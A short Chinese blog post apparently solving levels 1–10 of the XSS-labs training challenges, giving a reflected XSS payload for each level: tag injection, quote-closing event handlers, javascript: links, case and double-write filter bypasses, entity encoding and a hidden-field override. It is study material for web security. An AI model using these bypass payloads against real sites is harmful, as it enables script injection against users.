XSS-labs (1-10)

一、反射型(get)

<script>alert(1)</script>

二、闭合value和input标签

"><script>alert(1)</script>

(2F在url中就是/)

三、htmlspecialchars() 函数

htmlspecialchars() 函数把一些预定义的字符转换为 HTML 实体。

把 < 和 > 转换为实体常用于防止浏览器将其用作 HTML 元素。当用户有权在您的页面上显示输入时,对于防止代码运行非常有用。

预定义的字符是:

  • & (和号) 成为 &amp;
  • " (双引号) 成为 &quot;
  • ' (单引号) 成为 &#039;(默认不对单引号进行转换)
  • < (小于) 成为 &lt;
  • > (大于) 成为 &gt;

避过这些符号即可

' οnclick='javascript:alert(2)

四、过滤 <>,没有用htmlspecialchars()

" οnclick="javascript:alert(2)

五、过滤<script 和on

 

用<a>标签绕过

"><a href="javascript:alert(alert(123));">xss</a>

六、大小写绕过

没有大小写转换函数

" Onclick="javascript:alert(2)

七、双写绕过

敏感字符串替换为空,没有循环或正则

"><scscriptript>alert(1)</scscriptript>

八、编码绕过

在href中可以直接执行js

javasc&#82;ipt:alert(1);

九、通过 http://来检测是否是链接

可以写到后边绕过检测,并且//注释掉

javasc&#82;ipt:alert(1);//http://

十、type=hidden

构造payload更改type类型

1&t_sort=" οnclick=alert('123') type="text" >

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

梅_花_七

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值